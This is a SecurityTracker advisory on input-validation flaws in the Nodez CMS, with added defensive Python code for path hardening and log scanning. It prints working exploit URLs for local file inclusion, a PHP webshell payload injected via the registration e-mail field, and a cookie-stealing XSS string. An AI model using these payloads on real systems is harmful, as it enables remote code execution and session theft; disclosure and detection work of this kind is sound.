SecurityTracker.com
Category: Application (Forum/Board/Portal) > Nodez
Vendors: Nodez Project
Nodez Input Validation Flaw in 'op' Parameter Lets Remote Users Inject PHP Code and Also Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1015747
SecurityTracker URL:  http://securitytracker.com/id/1015747
CVE Reference:   GENERIC-MAP-NOMATCH   (no CVE identifier was mapped to this alert)
Date:  Mar 10 2006
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 4.6.1.1 and prior versions
Description:   Hamid Ebadi reported a vulnerability in Nodez. A remote user can execute arbitrary PHP code on the target system and can conduct cross-site scripting attacks against users of the site.

The software does not properly validate user-supplied input in the 'op' parameter before using it to build the path of a file to include. A remote user can supply a specially crafted URL containing directory traversal sequences and a trailing null byte (%00, which in PHP versions of that era truncated the path and so discarded any suffix the script appended) to cause the target system to include and execute PHP code from an arbitrary file on the target system. The included code, including any operating system commands it runs, executes with the privileges of the target web service.

A demonstration exploit URL is provided, where [SHELL] stands for a local file that already contains attacker-controlled PHP:

http://[target]/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir

A remote user can also get arbitrary PHP code stored in a file on the system and then use the inclusion flaw above to execute it.

For example, PHP code supplied as the 'Email' value at registration is stored unsanitised in 'cache/users/list.gtdat', the data file in which Nodez keeps user names, hashed passwords and e-mail addresses. Including that file through the 'op' parameter runs the injected code. Because the file lives under the web root, it can also be fetched directly, which exposes the password hashes to offline dictionary attacks.
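The inclusion step and the stored-code step above come down to one missing check: the request's 'op' value becomes a file path. The following Python model is added here for illustration and is not Nodez's own PHP code; the directory layout, the allowlist and the function names are assumptions. It shows the vulnerable pattern next to a hardened resolver, plus a strict check for the registration e-mail field that keeps PHP tags out of the data file.

```python
import posixpath
import re

# Assumed layout for this example (not Nodez's real tree): handlers selected by
# ?op= live under MODULES_DIR, two directories below the document root, so that
# "op=/../../cache/users/list.gtdat" from the advisory lands on the user data
# file Nodez keeps at <docroot>/cache/users/list.gtdat.
MODULES_DIR = "/var/www/nodez/modules"
KNOWN_OPS = {"block", "list", "view"}   # assumed allowlist, not Nodez's module names


def resolve_op_unsafe(op):
    """Models the vulnerable pattern: the raw request value is spliced into an
    include path. The appended ".php" suffix offers no protection because PHP
    of that era stopped reading the path at the first NUL byte (%00)."""
    path = MODULES_DIR + "/" + op + ".php"
    truncated = path.split("\x00", 1)[0]      # what the file system actually sees
    return posixpath.normpath(truncated)


def resolve_op_safe(op):
    """Hardened resolver: op must be a bare identifier on the allowlist and the
    final path must stay inside MODULES_DIR. Returns None for anything else."""
    if not isinstance(op, str) or "\x00" in op:
        return None
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", op):
        return None
    if op not in KNOWN_OPS:
        return None
    path = posixpath.normpath(posixpath.join(MODULES_DIR, op + ".php"))
    # Defence in depth: even an allowlisted name must resolve under MODULES_DIR.
    if posixpath.commonpath([path, MODULES_DIR]) != MODULES_DIR:
        return None
    return path


EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}\.[A-Za-z]{2,}$")


def email_is_acceptable(email):
    """Registration field check: a plain address only, so a value such as
    "<?system ($_GET['cmd']);?>" is never written to list.gtdat. This does not
    replace the real fix, which is to stop include()-ing a user-writable data file."""
    return bool(EMAIL_RE.match(email)) and "<?" not in email


if __name__ == "__main__":
    for op in ("block", "/../../cache/users/list.gtdat\x00",
               "block<script>alert(document.cookie)</script>"):
        print(repr(op), "unsafe ->", resolve_op_unsafe(op), "| safe ->", resolve_op_safe(op))
    print(email_is_acceptable("user@example.org"),
          email_is_acceptable("<?system ($_GET['cmd']);?>"))
```

The identifier allowlist does the real work; the commonpath check only guards against a later change that lets file names back into 'op'. Rejecting PHP tags in the e-mail field stops this particular payload, but the user data file should not be include()-able at all and should live outside the document root.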

The same unvalidated 'op' value can also be used for reflected cross-site scripting. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Nodez software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more
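For incident responders, the demonstration URLs above share signatures that are cheap to spot in web server logs: directory traversal and a null byte in 'op', the user data file named in 'op', a script tag in 'op', and direct fetches of cache/users/list.gtdat. The scanner below is an added example in Python and is not part of the advisory; the log lines are constructed for the demo and the tag names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines (not real traffic): one benign request,
# then the request shapes from the advisory, then a direct fetch of the user
# data file that Nodez keeps under the web root.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2006:12:00:01 +0000] "GET /nodez/?node=system&op=block&block=3&bop=more HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2006:12:00:07 +0000] "GET /nodez/?node=system&op=/../../../etc/passwd%00&cmd=dir HTTP/1.1" 200 1432 "-" "curl/7.15"
203.0.113.9 - - [10/Mar/2006:12:00:09 +0000] "GET /nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=id HTTP/1.1" 200 88 "-" "curl/7.15"
203.0.113.9 - - [10/Mar/2006:12:00:11 +0000] "GET /nodez/?node=system&op=block%3Cscript%3Ealert(document.cookie)%3C/script%3E&block=3&bop=more HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2006:12:00:12 +0000] "GET /cache/users/list.gtdat HTTP/1.1" 200 640 "-" "curl/7.15"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
USER_DB = "/cache/users/list.gtdat"   # data file location named in the advisory


def classify_request(target):
    """Return sorted tags for one request target (path + query).
    An empty list means nothing matched."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes values, so "%00" is checked as a real NUL byte
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    tags = set()
    op = params.get("op", "")
    if "../" in op or "..\\" in op:
        tags.add("lfi_traversal")
    if "\x00" in op:
        tags.add("null_byte")
    if "list.gtdat" in op:
        tags.add("data_file_include")
    if re.search(r"<\s*script\b|javascript:", op, re.I):
        tags.add("xss")
    # The advisory's exploit passes the OS command in cmd= alongside the include
    if tags and "cmd" in params:
        tags.add("cmd_param")
    if parts.path.lower().endswith(USER_DB):
        tags.add("userdb_direct_access")
    return sorted(tags)


def scan_log(text):
    """Parse combined-log lines and return a finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("target"))
        if tags:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "tags": tags,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], ",".join(f["tags"]), f["target"])
```

Because the query string is decoded before matching, the checks also catch '%2e%2e%2f' style encodings of the traversal; matching the raw request line would miss them. A 200 status on a traversal or data-file request is the line worth escalating, since it shows the inclusion succeeded rather than merely being attempted.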

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Nodez software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  nodez.greentinted.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Nodez [PHP Code Injection][Local Inclusion][Unauthenticated Access(Data files)]

Nodez [PHP Code Injection][Local File Inclusion][Unauthenticated Access(Data files)] Vulnerabilities
Nodez is a young, but strong, open source Content Manager. Nodez is designed to be as modular, stable and lightweight as possible.

Nodez does a lot of things differently from other CMSs, primarily as far as organization goes. In most CMSs, when you install a module it creates a single section for itself, and you can only use that module once.

In Nodez though, a module is not instructions for creating a section of your site, but rather it contains instructions for creating a certain file type. For example, the 3 basic modules--dir, node and node_lite--contain instructions for creating directories and plain text files. More complex modules, such as nForum or blog, contain instructions for creating all manner of pages, from forums to images to blogs, even surveys and image galleries.
[official Nodez News website]

http://nodez.greentinted.com

Credit:
The information has been provided by Hamid Ebadi (Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
Nodez Version: 4.6.1.1 (Mercury) and Below

Description:

Local File Inclusion:
Input passed to the "op" parameter isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.
http://localhost/nodez/?node=system&op=/../../../[SHELL]%00&cmd=dir
A remote attacker can use the following method to inject PHP code.

PHP Code Injection:
Input passed to the Email parameter when registering isn't properly sanitised before being stored in the PHP script "list.gtdat". This can be exploited to inject arbitrary PHP code and execute it (using Local File Inclusion).

Nodez stores all usernames and hashed passwords (and other information like Email ...) in a file called "list.gtdat" which is inside the web root. Example:
http://localhost/cache/users/list.gtdat
(It may then be possible to identify the password by brute forcing it using a dictionary attack.)

Exploit:
Register an account:
username: hamid
password: hamidnetworksecurityteam
email: PHP code like (PHP Code Injection):
<?system ($_GET['cmd']);?>
and then use local file inclusion:
http://localhost/nodez/?node=system&op=/../../cache/users/list.gtdat%00&cmd=dir

XSS :
http://localhost/nodez/?node=system&op=block<script>alert(document.cookie)</script>&block=3&bop=more






Copyright 2022, SecurityGlobal.net LLC